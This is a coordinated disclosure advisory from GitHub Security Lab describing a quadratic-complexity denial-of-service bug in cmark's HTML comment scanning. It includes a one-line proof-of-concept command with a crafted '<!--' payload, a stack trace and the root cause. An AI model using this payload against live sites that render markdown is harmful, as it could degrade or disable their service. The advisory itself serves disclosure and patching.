Coordinated Disclosure Timeline

Summary

A crafted markdown document can trigger a quadratic complexity algorithm in cmark.

Product

cmark

Tested Version

Latest master: cd5b2f6

Details

Issue: quadratic behavior in handle_pointy_brace (GHSL-2022-098)

A markdown document containing a large number of repetitions of the characters <!-- can trigger quadratic behavior.

Proof of concept:

python3 -c 'print("</" + "<!--" * 80000)' | cmark

Increasing the number 80000 in the above command causes the running time to increase quadratically.

This is sample stack trace from the quadratic algorithm:

  1. _scan_html_comment (p=0x7ffff7c358af "!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<"...) at src/scanners.c:5452
  2. 0x000055555556b480 in _scan_at (scanner=0x555555571ff9 <_scan_html_comment>, c=0x7fffffffbdc8, offset=9784) at src/scanners.c:17
  3. 0x0000555555569c9a in handle_pointy_brace (subj=0x7fffffffbdc0, options=0) at src/inlines.c:917
  4. 0x000055555556acd4 in parse_inline (subj=0x7fffffffbdc0, parent=0x5555555ab790, options=0) at src/inlines.c:1336
  5. 0x000055555556b09e in cmark_parse_inlines (mem=0x5555555a90e0 <DEFAULT_MEM_ALLOCATOR>, parent=0x5555555ab790, refmap=0x5555555aa570, options=0) at src/inlines.c:1398
  6. 0x000055555556545d in process_inlines (mem=0x5555555a90e0 <DEFAULT_MEM_ALLOCATOR>, root=0x5555555aa370, refmap=0x5555555aa570, options=0) at src/blocks.c:408
  7. 0x00005555555658ab in finalize_document (parser=0x5555555aa2c0) at src/blocks.c:530
  8. 0x0000555555567626 in cmark_parser_finish (parser=0x5555555aa2c0) at src/blocks.c:1303
  9. 0x0000555555562fa2 in main (argc=2, argv=0x7fffffffdfe8) at src/main.c:203

We believe that the quadratic behavior is caused by the call to scan_html_comment at src/inlines.c:917:

matchlen = scan_html_comment(&subj->input, subj->pos + 1);

scan_html_comment is a regex, which scans to the end of the current line. Due to the malicious input string, it is called repeatedly after every < character.

This bug was introduced by commit 4470ff3, so it does not exist in the most recently released version: 0.30.2. However, other quadratic issues, such as issue 431, have been fixed since version 0.30.2, so it seems likely that some cmark users are running the latest master branch rather than version 0.30.2 and may be affected by this bug.

Impact

This issue could be used in a denial-of-service attack on websites that use cmark to render markdown documents.

CVE

Credit

This issue was discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-098 in any communication regarding this issue.